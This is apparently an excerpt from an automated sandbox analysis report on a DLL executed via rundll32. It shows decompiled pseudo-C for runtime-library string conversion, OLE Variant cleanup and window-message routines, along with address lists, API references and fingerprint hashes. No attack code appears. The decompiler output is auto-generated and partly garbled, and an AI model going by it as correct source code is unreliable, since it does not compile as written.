                                                                        0x100135ab
                                                                        0x100135ae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100135b0
                                                                        0x100135b6
                                                                        0x100135bd
                                                                        0x100135c4
                                                                        0x100135c7
                                                                        0x100135c9
                                                                        0x100135cc
                                                                        0x100135cf
                                                                        0x100135d6
                                                                        0x100135d9
                                                                        0x00000000
                                                                        0x10013539
                                                                        0x10013539
                                                                        0x1001353e
                                                                        0x10013544
                                                                        0x10013547
                                                                        0x1001354a
                                                                        0x1001354d
                                                                        0x10013552
                                                                        0x10013559
                                                                        0x1001355b
                                                                        0x10013561
                                                                        0x1001356a
                                                                        0x10013570
                                                                        0x10013575
                                                                        0x10013576
                                                                        0x1001357d
                                                                        0x10013585
                                                                        0x10013588
                                                                        0x10013588
                                                                        0x1001356a
                                                                        0x100136ea
                                                                        0x100136ea
                                                                        0x100136f1
                                                                        0x100136f4
                                                                        0x100136f4
                                                                        0x1001352d
                                                                        0x10013518
                                                                        0x1001351a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001351a

                                                                        APIs
                                                                          • Part of subcall function 10018BEF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                        • __allrem.LIBCMT ref: 100135FA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001361B
                                                                        • __allrem.LIBCMT ref: 10013637
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001365A
                                                                        • __allrem.LIBCMT ref: 10013676
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013699
                                                                          • Part of subcall function 10019447: __lock.LIBCMT ref: 10019455
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                        • String ID:
                                                                        • API String ID: 1282128132-0
                                                                        • Opcode ID: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                        • Instruction ID: c60af2d58918d4078ab001666915cbd37c2ef6b2e54b6b359c888c98dc157d7e
                                                                        • Opcode Fuzzy Hash: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                        • Instruction Fuzzy Hash: CC616DB5A00605EFDB64CF68C88199EBBF5EB44324B21C57EE055EB391E730EE859B40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001843D Relevance: 9.1, APIs: 6, Instructions: 145COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E1001843D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				void* _t43;
				short* _t45;
				int _t58;
				int _t62;
				long _t65;
				int _t67;
				void* _t69;
				short* _t77;
				short* _t78;
				int _t79;
				short* _t83;
				short* _t84;
				void* _t85;
				short* _t86;
				void* _t91;

				_t69 = __ecx;
				_push(0x1c);
				_push(0x10042730);
				E10012514(__ebx, __edi, __esi);
				_t83 = 0;
				_t91 =  *0x1004f740 - _t83; // 0x1
				if(_t91 == 0) {
					if(GetStringTypeW(1, 0x10042704, 1, _t85 - 0x1c) == 0) {
						_t65 = GetLastError();
						__eflags = _t65 - 0x78;
						if(_t65 == 0x78) {
							 *0x1004f740 = 2;
						}
					} else {
						 *0x1004f740 = 1;
					}
				}
				_t42 =  *0x1004f740; // 0x1
				if(_t42 == 2 || _t42 == _t83) {
					_t67 =  *(_t85 + 0x1c);
					__eflags = _t67 - _t83;
					if(_t67 == _t83) {
						_t67 =  *0x1004f724; // 0x0
					}
					_t77 =  *(_t85 + 0x18);
					__eflags = _t77;
					if(_t77 == 0) {
						_t77 =  *0x1004f734; // 0x0
					}
					_t43 = E1001A444(_t67, _t67);
					__eflags = _t43 - 0xffffffff;
					if(_t43 != 0xffffffff) {
						__eflags = _t43 - _t77;
						if(__eflags == 0) {
							L29:
							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
							__eflags = _t83;
							if(__eflags != 0) {
								_push(_t83);
								E100107C8(_t67, _t78, _t83, __eflags);
							}
							_t45 = _t78;
							goto L32;
						}
						_push(0);
						_push(0);
						_push(_t85 + 0x10);
						_push( *(_t85 + 0xc));
						_push(_t43);
						_push(_t77);
						_t83 = E1001A487(_t67, _t77, _t83, __eflags);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L25;
						}
						 *(_t85 + 0xc) = _t83;
						goto L29;
					} else {
						goto L25;
					}
				} else {
					if(_t42 != 1) {
						L25:
						_t45 = 0;
						L32:
						return E1001254F(_t45);
					}
					 *(_t85 - 0x24) = _t83;
					 *(_t85 - 0x20) = _t83;
					if( *(_t85 + 0x18) == _t83) {
						_t62 =  *0x1004f734; // 0x0
						 *(_t85 + 0x18) = _t62;
					}
					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
					 *(_t85 - 0x28) = _t79;
					if(_t79 == 0) {
						goto L25;
					} else {
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t68 = _t79 + _t79;
						E10010B20(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
						 *(_t85 - 0x18) = _t86;
						_t84 = _t86;
						 *(_t85 - 0x2c) = _t84;
						E10011C50(_t84, 0, _t79 + _t79);
						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
						_t99 = _t84;
						if(_t84 != 0) {
							L15:
							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
							if(_t58 != 0) {
								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
							}
							_t102 =  *(_t85 - 0x20);
							if( *(_t85 - 0x20) != 0) {
								_push(_t84);
								E100107C8(_t68, _t79, _t84, _t102);
							}
							_t45 =  *(_t85 - 0x24);
							goto L32;
						} else {
							_push(_t79);
							_push(2);
							_t84 = E1001382A(_t68, _t79, _t84, _t99);
							if(_t84 == 0) {
								goto L25;
							}
							 *(_t85 - 0x20) = 1;
							goto L15;
						}
					}
				}
			}



















                                                                        0x1001843d
                                                                        0x1001843d
                                                                        0x1001843f
                                                                        0x10018444
                                                                        0x10018449
                                                                        0x1001844b
                                                                        0x10018451
                                                                        0x10018469
                                                                        0x10018473
                                                                        0x10018479
                                                                        0x1001847c
                                                                        0x1001847e
                                                                        0x1001847e
                                                                        0x1001846b
                                                                        0x1001846b
                                                                        0x1001846b
                                                                        0x10018469
                                                                        0x10018488
                                                                        0x10018490
                                                                        0x10018580
                                                                        0x10018583
                                                                        0x10018585
                                                                        0x10018587
                                                                        0x10018587
                                                                        0x1001858d
                                                                        0x10018590
                                                                        0x10018592
                                                                        0x10018594
                                                                        0x10018594
                                                                        0x1001859b
                                                                        0x100185a1
                                                                        0x100185a4
                                                                        0x100185aa
                                                                        0x100185ac
                                                                        0x100185cc
                                                                        0x100185df
                                                                        0x100185e1
                                                                        0x100185e3
                                                                        0x100185e5
                                                                        0x100185e6
                                                                        0x100185eb
                                                                        0x100185ec
                                                                        0x00000000
                                                                        0x100185ec
                                                                        0x100185ae
                                                                        0x100185b0
                                                                        0x100185b5
                                                                        0x100185b6
                                                                        0x100185b9
                                                                        0x100185ba
                                                                        0x100185c3
                                                                        0x100185c5
                                                                        0x100185c7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100185c9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001849e
                                                                        0x100184a1
                                                                        0x100185a6
                                                                        0x100185a6
                                                                        0x100185ee
                                                                        0x100185f6
                                                                        0x100185f6
                                                                        0x100184a7
                                                                        0x100184aa
                                                                        0x100184b0
                                                                        0x100184b2
                                                                        0x100184b7
                                                                        0x100184b7
                                                                        0x100184db
                                                                        0x100184dd
                                                                        0x100184e2
                                                                        0x00000000
                                                                        0x100184e8
                                                                        0x100184e8
                                                                        0x100184ec
                                                                        0x100184f7
                                                                        0x100184fc
                                                                        0x100184ff
                                                                        0x10018501
                                                                        0x10018508
                                                                        0x10018510
                                                                        0x1001852b
                                                                        0x1001852d
                                                                        0x10018546
                                                                        0x10018553
                                                                        0x1001855b
                                                                        0x1001856b
                                                                        0x1001856b
                                                                        0x1001856e
                                                                        0x10018572
                                                                        0x10018574
                                                                        0x10018575
                                                                        0x1001857a
                                                                        0x1001857b
                                                                        0x00000000
                                                                        0x1001852f
                                                                        0x1001852f
                                                                        0x10018530
                                                                        0x10018539
                                                                        0x1001853d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001853f
                                                                        0x00000000
                                                                        0x1001853f
                                                                        0x1001852d
                                                                        0x100184e2

                                                                        APIs
                                                                        • GetStringTypeW.KERNEL32(00000001,10042704,00000001,?,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 10018461
                                                                        • GetLastError.KERNEL32 ref: 10018473
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 100184D5
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,10012C1E,?,00000000), ref: 10018553
                                                                        • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 10018565
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 3581945363-0
                                                                        • Opcode ID: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                        • Instruction ID: 357f909d61fdf3067703904fdff93fde9d84214a81f0f6dffe892fe1b28005b1
                                                                        • Opcode Fuzzy Hash: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                        • Instruction Fuzzy Hash: D2418071900629ABEB12CF60CC85A9E3BA6FF497A0F114108F810EE191D735DF91DBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000F210 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 41%
                                                                        			E1000F210(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t73;
				intOrPtr _t85;
				intOrPtr* _t89;
				intOrPtr* _t92;
				intOrPtr* _t94;
				void* _t99;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t129;

				_t117 = __edx;
				E10011BF0(0x1003b066, _t126);
				_t129 = _t128 - 0x6c;
				_t73 = 0;
				_t124 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t126 - 0x10) = 0;
				 *(_t126 - 0x18) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L21:
					 *(_t124 + 0x44) =  *(_t124 + 0x44) & 0x00000000;
					 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
					return 0;
				}
				do {
					_t104 = _t73 + _t73 * 4 << 3;
					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + (_t73 + _t73 * 4 << 3) + 0x24));
					if(_t109 == 0) {
						goto L19;
					}
					_t110 =  *((intOrPtr*)(_t109 + 4));
					 *((intOrPtr*)(_t126 - 0x20)) = _t110;
					if(_t110 == 0) {
						goto L19;
					}
					 *(_t126 - 0x14) =  *(_t126 - 0x10) << 4;
					do {
						_t122 =  *((intOrPtr*)(E10006D96(_t126 - 0x20)));
						 *((intOrPtr*)(_t126 - 0x24)) = 0xfffffffd;
						E10011C50(_t126 - 0x78, 0, 0x20);
						_t129 = _t129 + 0xc;
						E10010592(_t126 - 0x48);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						_t135 =  *((intOrPtr*)(_t124 + 0x48));
						if( *((intOrPtr*)(_t124 + 0x48)) == 0) {
							_t85 =  *((intOrPtr*)(_t124 + 0x40)) +  *(_t126 - 0x14);
							__eflags = _t85;
						} else {
							_t99 = E1000ECE8(_t104, _t124, _t117, _t122, _t124, _t135, _t126 - 0x58,  *(_t126 - 0x18) + 1);
							 *(_t126 - 4) = 1;
							E10010578(_t99, _t126 - 0x48, _t99);
							 *(_t126 - 4) = 0;
							__imp__#9(_t126 - 0x58);
							_t85 = _t126 - 0x48;
						}
						 *((intOrPtr*)(_t126 - 0x38)) = _t85;
						 *((intOrPtr*)(_t126 - 0x34)) = _t126 - 0x24;
						 *((intOrPtr*)(_t126 - 0x30)) = 1;
						 *((intOrPtr*)(_t126 - 0x2c)) = 1;
						 *(_t122 + 0x84) = 1;
						_t89 =  *((intOrPtr*)(_t122 + 0x4c));
						if(_t89 != 0) {
							_t117 = _t126 - 0x1c;
							_push(_t126 - 0x1c);
							_push(0x10043098);
							_push(_t89);
							if( *((intOrPtr*)( *_t89))() >= 0) {
								_t92 =  *((intOrPtr*)(_t126 - 0x1c));
								_t117 = _t126 - 0x38;
								 *((intOrPtr*)( *_t92 + 0x18))(_t92,  *((intOrPtr*)(_t122 + 0x98)), 0x10043018, 0, 4, _t126 - 0x38, 0, _t126 - 0x78, _t126 - 0x28);
								_t94 =  *((intOrPtr*)(_t126 - 0x1c));
								 *((intOrPtr*)( *_t94 + 8))(_t94);
								 *(_t122 + 0x84) =  *(_t122 + 0x84) & 0x00000000;
								if( *((intOrPtr*)(_t126 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x74)));
								}
								if( *((intOrPtr*)(_t126 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x70)));
								}
								if( *((intOrPtr*)(_t126 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x6c)));
								}
								 *(_t126 - 0x10) =  *(_t126 - 0x10) + 1;
								 *(_t126 - 0x14) =  *(_t126 - 0x14) + 0x10;
							}
						}
						 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
						__imp__#9(_t126 - 0x48);
					} while ( *((intOrPtr*)(_t126 - 0x20)) != 0);
					_t73 =  *(_t126 - 0x18);
					L19:
					_t73 = _t73 + 1;
					 *(_t126 - 0x18) = _t73;
				} while (_t73 <  *((intOrPtr*)(_t124 + 0x10)));
				goto L21;
			}



















                                                                        0x1000f210
                                                                        0x1000f215
                                                                        0x1000f21a
                                                                        0x1000f21d
                                                                        0x1000f220
                                                                        0x1000f225
                                                                        0x1000f22c
                                                                        0x1000f22f
                                                                        0x1000f232
                                                                        0x1000f39d
                                                                        0x1000f39d
                                                                        0x1000f3a7
                                                                        0x1000f3af
                                                                        0x1000f3af
                                                                        0x1000f23a
                                                                        0x1000f240
                                                                        0x1000f243
                                                                        0x1000f249
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f24f
                                                                        0x1000f254
                                                                        0x1000f257
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f263
                                                                        0x1000f266
                                                                        0x1000f276
                                                                        0x1000f280
                                                                        0x1000f287
                                                                        0x1000f28c
                                                                        0x1000f293
                                                                        0x1000f298
                                                                        0x1000f29c
                                                                        0x1000f2a0
                                                                        0x1000f2d5
                                                                        0x1000f2d5
                                                                        0x1000f2a2
                                                                        0x1000f2ad
                                                                        0x1000f2b6
                                                                        0x1000f2ba
                                                                        0x1000f2c3
                                                                        0x1000f2c7
                                                                        0x1000f2cd
                                                                        0x1000f2cd
                                                                        0x1000f2d8
                                                                        0x1000f2de
                                                                        0x1000f2e4
                                                                        0x1000f2e7
                                                                        0x1000f2ea
                                                                        0x1000f2f0
                                                                        0x1000f2f5
                                                                        0x1000f2f9
                                                                        0x1000f2fc
                                                                        0x1000f2fd
                                                                        0x1000f302
                                                                        0x1000f307
                                                                        0x1000f309
                                                                        0x1000f318
                                                                        0x1000f32c
                                                                        0x1000f32f
                                                                        0x1000f335
                                                                        0x1000f338
                                                                        0x1000f343
                                                                        0x1000f348
                                                                        0x1000f348
                                                                        0x1000f352
                                                                        0x1000f357
                                                                        0x1000f357
                                                                        0x1000f361
                                                                        0x1000f366
                                                                        0x1000f366
                                                                        0x1000f36c
                                                                        0x1000f36f
                                                                        0x1000f36f
                                                                        0x1000f307
                                                                        0x1000f373
                                                                        0x1000f37b
                                                                        0x1000f381
                                                                        0x1000f38b
                                                                        0x1000f38e
                                                                        0x1000f38e
                                                                        0x1000f392
                                                                        0x1000f392
                                                                        0x00000000

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1000F215
                                                                        • VariantClear.OLEAUT32(?), ref: 1000F2C7
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 1000F348
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 1000F357
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 1000F366
                                                                        • VariantClear.OLEAUT32(00000000), ref: 1000F37B
                                                                          • Part of subcall function 1000ECE8: __EH_prolog.LIBCMT ref: 1000ECED
                                                                          • Part of subcall function 1000ECE8: VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                          • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                        • String ID:
                                                                        • API String ID: 3098219910-0
                                                                        • Opcode ID: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
                                                                        • Instruction ID: 75c5e2025475ce32d6cb8a8ad57bceb5efa69f1f793163f183f6db466388bc1f
                                                                        • Opcode Fuzzy Hash: bf17ac4818e0564067b8238a0aa3a1f993aac9d9eae25163256e1dd43de28d52
                                                                        • Instruction Fuzzy Hash: 455117B1900209AFEB14CFA4C884BEEBBB9FF08355F104529E116EB655D774AA45CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002B9F8 Relevance: 9.1, APIs: 6, Instructions: 122windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E1002B9F8(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed char _t63;
				intOrPtr* _t85;
				intOrPtr* _t88;

				_t41 =  *0x1004c470; // 0x1bfbe703
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_v8 = _t41;
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x110))();
				_t44 = _a8;
				 *(_t44 + 8) =  *(_t44 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t44 + 0xa)) = 0;
				 *((char*)(_t44 + 0xb)) = 0;
				if(E10011FB0(_t44,  &_v28, 0x14) != 0) {
					_v36 = E100202AB(_t88);
					E100202DF(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, __edi);
					_v32 = SendMessageA( *(_t88 + 0x1c), 0x43d, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32 + 1, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 1, 0);
					_t85 = _a8;
					 *((intOrPtr*)( *_t88 + 0x110))(0x415, _a4, _t85);
					E100202DF(_t88, 0, _v36 & 0x10000000, 0);
					_t63 =  *((intOrPtr*)(_t85 + 9));
					if(((_t63 ^ _v19) & 0x00000001) != 0 || (_t63 & 0x00000001) != 0 &&  *_t85 != _v28) {
						_push(1);
						_push(0);
						goto L7;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
							_push(1);
							_push( &_v52);
							L7:
							_t45 = InvalidateRect( *(_t88 + 0x1c), ??, ??);
						}
					}
				}
				return E100117AE(_t45, _v8);
			}
















                                                                        0x1002b9fe
                                                                        0x1002ba05
                                                                        0x1002ba0a
                                                                        0x1002ba0b
                                                                        0x1002ba0e
                                                                        0x1002ba13
                                                                        0x1002ba1a
                                                                        0x1002ba20
                                                                        0x1002ba23
                                                                        0x1002ba30
                                                                        0x1002ba33
                                                                        0x1002ba36
                                                                        0x1002ba39
                                                                        0x1002ba46
                                                                        0x1002ba5d
                                                                        0x1002ba60
                                                                        0x1002ba72
                                                                        0x1002ba91
                                                                        0x1002ba94
                                                                        0x1002baa4
                                                                        0x1002bab2
                                                                        0x1002babc
                                                                        0x1002babe
                                                                        0x1002bace
                                                                        0x1002bae1
                                                                        0x1002bae6
                                                                        0x1002baf1
                                                                        0x1002bb20
                                                                        0x1002bb22
                                                                        0x00000000
                                                                        0x1002bafe
                                                                        0x1002bb03
                                                                        0x1002bb04
                                                                        0x1002bb09
                                                                        0x1002bb16
                                                                        0x1002bb18
                                                                        0x1002bb1d
                                                                        0x1002bb23
                                                                        0x1002bb26
                                                                        0x1002bb26
                                                                        0x1002bb16
                                                                        0x1002bb2c
                                                                        0x1002bb38

                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • SendMessageA.USER32 ref: 1002BA88
                                                                        • SendMessageA.USER32 ref: 1002BA94
                                                                        • SendMessageA.USER32 ref: 1002BAA4
                                                                        • SendMessageA.USER32 ref: 1002BAB2
                                                                        • SendMessageA.USER32 ref: 1002BABC
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 1002BB26
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$InvalidateLongRectWindow
                                                                        • String ID:
                                                                        • API String ID: 74886174-0
                                                                        • Opcode ID: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                        • Instruction ID: d3f4ff1b3068862bce3741e6c92e476afb765aaf48ff9a7e93f31cae0c4b6ca1
                                                                        • Opcode Fuzzy Hash: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                        • Instruction Fuzzy Hash: D0416CB0600248BFEB11DB94DC95EFEBBB9EF48744F414459FA41AB291C6B0AD45CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10030A77 Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E10030A77(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;

				_t58 = __edx;
				_t60 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E100220EE(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
				if(E100220EE(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
					L19:
					E100308EB(_t60, _t72);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
								E1003075A(_t60, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E100220EE(_t61, GetCapture());
								_t72 = _t32 -  *((intOrPtr*)(_t60 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t60 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if(__eflags != 0) {
								E1003075A(_t60, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t55 = _v32.pt;
							_t58 = _v8;
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_push(_t55);
							_push(_t55);
							_t37 = _t62;
							 *_t37 = _t55;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t56 = _t60;
							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
								E1003078E(_t56, 0);
							} else {
								E100306DB(_t56);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t57 = _t60;
							if(__eflags == 0) {
								E10030A33(_t61, __eflags);
							} else {
								E10030930(_t57, _t58, 0, _t60, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E1003A098();
					goto L19;
				}
			}




















                                                                        0x10030a77
                                                                        0x10030a86
                                                                        0x10030a8c
                                                                        0x10030b66
                                                                        0x00000000
                                                                        0x10030b66
                                                                        0x10030a9f
                                                                        0x10030aaf
                                                                        0x10030b5f
                                                                        0x10030b61
                                                                        0x00000000
                                                                        0x10030ab5
                                                                        0x10030ab7
                                                                        0x10030acf
                                                                        0x10030ad4
                                                                        0x10030b34
                                                                        0x10030b3a
                                                                        0x10030b43
                                                                        0x10030b43
                                                                        0x10030b48
                                                                        0x10030b4c
                                                                        0x10030b4e
                                                                        0x10030b51
                                                                        0x10030b56
                                                                        0x10030b59
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10030b59
                                                                        0x00000000
                                                                        0x10030b4c
                                                                        0x10030ad6
                                                                        0x10030ad7
                                                                        0x10030b1f
                                                                        0x10030b25
                                                                        0x10030b2d
                                                                        0x10030b2d
                                                                        0x00000000
                                                                        0x10030b25
                                                                        0x10030ad9
                                                                        0x10030ade
                                                                        0x10030af8
                                                                        0x10030afb
                                                                        0x10030afe
                                                                        0x10030b04
                                                                        0x10030b05
                                                                        0x10030b06
                                                                        0x10030b08
                                                                        0x10030b0a
                                                                        0x10030b0d
